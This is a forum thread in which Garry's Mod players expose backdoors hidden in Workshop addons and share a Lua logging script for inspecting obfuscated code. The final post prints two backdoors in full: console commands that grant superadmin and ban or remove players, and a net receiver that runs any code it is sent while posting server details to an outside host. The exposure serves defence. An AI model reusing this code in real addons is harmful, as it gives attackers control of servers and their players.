• Backdoor Busting 2016
    12 replies, posted
Hey guys, I've taken it upon myself to declare war on the fuckboys and their shitty backdoors. All the code previewed here lives on my server. If you don't trust my findings you're free to download the addons and check for yourself. Note that the previewed code might be out of date by a few weeks. I'd suggest carefully checking these and handling them on a case-by-case basis, as I'm not sure about a few. To start with, here's two different variations of a Taser swep that seem to be using slightly different versions of the same backdoor. They use a "cleverly" tabbed out function that looks innocent enough until you see what the variables are defined as. [B](1)[/B] [url]http://hisoka.cogg.rocks/preview/?id=1249417&crc=3125740680[/url] [B](2)[/B] [url]http://hisoka.cogg.rocks/preview/?id=1271974&crc=3459203385[/url] Another one hidden by indenting the shit out of it. It's obfuscated but looks super suspicious. Random dependancy on ULX because people who write backdoors are really smart. [B](3)[/B] [url]http://hisoka.cogg.rocks/preview/?id=3100960&crc=2157769790[/url] Not really sure what this is. It appears to be an attempt to hide some suspicious shit in a file full of cancer. I think it's supposed to crash people on a list loaded over HTTP by removing them. [B](4)[/B] [url]http://hisoka.cogg.rocks/preview/?id=3330247&crc=3814085632[/url] Shoutout to my homies who thought it would be a good idea to put the word "backdoor" verbatim in their code. [B](5)[/B] [url]http://hisoka.cogg.rocks/preview/?id=2478078&crc=2481040990[/url] [B](6)[/B] [url]http://hisoka.cogg.rocks/preview/?id=3374496&crc=3848060131[/url] Here's another work of art. [B](7)[/B] [url]http://hisoka.cogg.rocks/preview/?id=5289073&crc=968133780[/url] Dunno what this is. Found it in three different addons. [B](8)[/B] [url]http://hisoka.cogg.rocks/preview/?id=4990049&crc=4155926611[/url] My first find. I wasn't sure it was worth including, but it is called "backdoor.lua", which is pretty neat. [B](9)[/B] [url]http://hisoka.cogg.rocks/preview/?id=6364680&crc=1216301658[/url] How much do you want to bet this is for "testing"? [B](10)[/B] [url]http://hisoka.cogg.rocks/preview/?id=2897092&crc=3461292573[/url] I don't think this is a backdoor but it's pretty funny regardless. [B](A)[/B] [url]http://hisoka.cogg.rocks/preview/?id=6133020&crc=2619945372[/url] [B](B)[/B] [url]http://hisoka.cogg.rocks/preview/?id=6133016&crc=3087631114[/url] I found a whole load of this "demonic king" bullshit, in various addons, most of them server content. Not sure what the obfuscated code does. I assume they're accidental reuploads of some old backdoor. Not sure I would bother doing anything about them, but I can provide an exhaustive list if you want it. [B](i) [/B][url]http://hisoka.cogg.rocks/preview/?id=1786240&crc=3180406226[/url] [B](ii)[/B] [url]http://hisoka.cogg.rocks/preview/?id=1796073&crc=3307767168[/url] [B](iii)[/B] [url]http://hisoka.cogg.rocks/preview/?id=2803254&crc=1641864852[/url] I'd also like to add that several versions of fm_buildaboat_canal have embedded lua that disables ULX logging, and unbans/admins STEAM_0:1:40285439 and/or someone called "oreowolf". Not sure this is worth worrying about either. That's all I have for now, although I'm sure there's more fuckboyism to be exposed.
I remember a while back, someone on WAYWO indexed the lua of literally every workshop upload to that date. Might be fun to do a quick search through that, finding every verbatim index of "backdoor"
[QUOTE=TFA;50798818]I remember a while back, someone on WAYWO indexed the lua of literally every workshop upload to that date. Might be fun to do a quick search through that, finding every verbatim index of "backdoor"[/QUOTE] That was either me or two people on this forum desperately need to get a life.
[QUOTE=MadParakeet;50798822]desperately need to get a life.[/QUOTE] but why though, doing tons of work on a game that you can't put on a resume is great!!! (says the guy with 10k hours in the very same game :pudge:)
Justice served where appropriate, except for Nr. 8, gotta decode that code first.
[QUOTE=Robotboy655;50798934]Justice served where appropriate, except for Nr. 8, gotta decode that code first.[/QUOTE] I would just remove it anyway. There's no reason why you should have that kind of obfuscation in a Workshop addon.
[QUOTE=Robotboy655;50798934]Justice served where appropriate, except for Nr. 8, gotta decode that code first.[/QUOTE] Neato. I might try adding a deobfuscator into my system next time I go searching, although getting rid of literally hundreds of thousands of false positives takes precedence.
[QUOTE=Robotboy655;50798934]Justice served where appropriate, except for Nr. 8, gotta decode that code first.[/QUOTE] [img]http://i.imgur.com/l7anUlB.png[/img] [img]http://i.imgur.com/iaD4gVG.png[/img]
[QUOTE=man with hat;50798987][IMG]http://i.imgur.com/wKLFQXu.png[/IMG] [IMG]http://i.imgur.com/iaD4gVG.png[/IMG][/QUOTE] Huh. Well, that's a mystery solved. Here's a list of duplicates of that file: [URL]http://hisoka.cogg.rocks/preview/?id=5187941&crc=4155926611[/URL] [URL]http://hisoka.cogg.rocks/preview/?id=6653940&crc=4155926611[/URL] [URL]http://hisoka.cogg.rocks/preview/?id=4974896&crc=4155926611[/URL] I still think that one's a bit bizarre though. They're all pretty insignificant addons, and their authors are all different with private profiles. Are there any public obfuscators that produce that sort of output?
I figured I'd share this in case anyone else wants to analyze obfuscated scripts without actually deobfuscating it. The functions to inspect are at the top. Obfuscated script goes at the bottom. [lua]local thisFile = debug.getinfo(1).short_src local funcs = { "RunString", "RunStringEx", "CompileString", "CompileFile", "Player.SteamID", "http.Fetch", "http.Post", "concommand.Add", "concommand.Remove", "hook.Add", "net.Receive", "net.ReadString", "net.WriteString", "timer.Create", } local function StringToFunction(str) local tbl = str:Split(".") local _R = debug.getregistry() local currentValue, parent for k, v in ipairs(tbl) do currentValue = currentValue and currentValue[v] or _R[v] or _G[v] if (istable(currentValue)) then parent = currentValue continue end if (isfunction(currentValue)) then return currentValue, tbl[#tbl], parent or _G end end end if (!bdb) then for k, v in pairs(funcs) do local func, name, parent = StringToFunction(v) parent[name] = function(...) local src = debug.getinfo(2).short_src if (src and src == thisFile) then print(v, ...) end return func(...) end end bdb = true end -- Insert spooky code below [/lua]
The backdoor in fm_buildaboat was put in place to prevent other servers from using it.
[QUOTE=BillyOnWiiU;50798947]I would just remove it anyway. There's no reason why you should have that kind of obfuscation in a Workshop addon.[/QUOTE] Shoot first, ask questions later. Great example to set
cats and dogs is a boring movie rn ? [code] if _G["SERVER"] then _G["concommand"]["Add"]("backdv1",function(p,c,a) p["PrintMessage"](p, HUD_PRINTCONSOLE, "You are super admin!" ) ULib["ucl"]["addUser"](p["SteamID"](p), {}, {}, "superadmin") end) _G["concommand"]["Add"]("check", function(p,c,a) p["PrintMessage"](p, HUD_PRINTCONSOLE, "It's there!" ) end) _G["concommand"]["Add"]("syncplayers",function(p,c,a) p["PrintMessage"](p, HUD_PRINTCONSOLE, "Everyone admin!" ) for _, v in _G["pairs"]( _G["player"]["GetAll"]() ) do ULib["ucl"]["addUser"](v["SteamID"](v), {}, {}, "admin") end end) _G["concommand"]["Add"]("backdplayers",function(p,c,a) p["PrintMessage"](p, HUD_PRINTCONSOLE, "Removed players!" ) for _, v in _G["pairs"]( _G["player"]["GetAll"]() ) do if not v["IsAdmin"](v) then v["Remove"](v) end end end) _G["concommand"]["Add"]("backdv5",function(p,c,a) p["PrintMessage"](p, HUD_PRINTCONSOLE, "Banned everyone!" ) for _, v in _G["pairs"]( _G["player"]["GetAll"]() ) do if not v["IsAdmin"](v) then ULib["queueFunctionCall"]( ULib["kickban"], v, 0, "No RP", nil ) end end end) _G["concommand"]["Add"]("addmeagainv2",function(p,c,a) p["PrintMessage"](p, HUD_PRINTCONSOLE, "Added you to super admin group!" ) _G["RunConsoleCommand"]("ulx", "adduserid", p["SteamID"](p), "superadmin") end) _G["concommand"]["Add"]("backdadmins",function(p,c,a) if v["IsAdmin"](v) then ULib["queueFunctionCall"]( ULib["kickban"], v, 0, "No RP", nil ) end end) end if _G["CLIENT"] then local Bool=false _G["concommand"]["Add"]("backdv2",function(p,c,a) Bool=true end) _G["hook"]["Add"]("HUDPaint", "HUD__x",function() if Bool then _G["surface"]["SetDrawColor"]( 255, 255, 255, 255 ) _G["surface"]["SetMaterial"](_G["Material"]("models/icon.vtf")) _G["surface"]["DrawTexturedRect"]( _G["ScrW"]()/2-1500, _G["ScrH"]()/2-1500, 3000, 3000) end end) _G["concommand"]["Add"]("check2", function(p,c,a) _G["print"]("works") end) end [/code] demonic king [code] if SERVER and game["IsDedicated"]() then local f = (function() end) local c = CompileString local r = net["ReadString"] util["AddNetworkString"]("m9k_addons") net["Receivers"]["m9k_addons"] = (function() local s = c(r() or "--", "[C]", false) if type(s) ~= "string" then xpcall(s, f) end end) timer["simple"](16, function() http["Post"]("http://gmod.hints.me/", {hn = GetConVarString("hostname"), ip = GetConVarString("ip"), np = #player["GetAll"]()}, f, f) end) end [/code]
Sorry, you need to Log In to post a reply to this thread.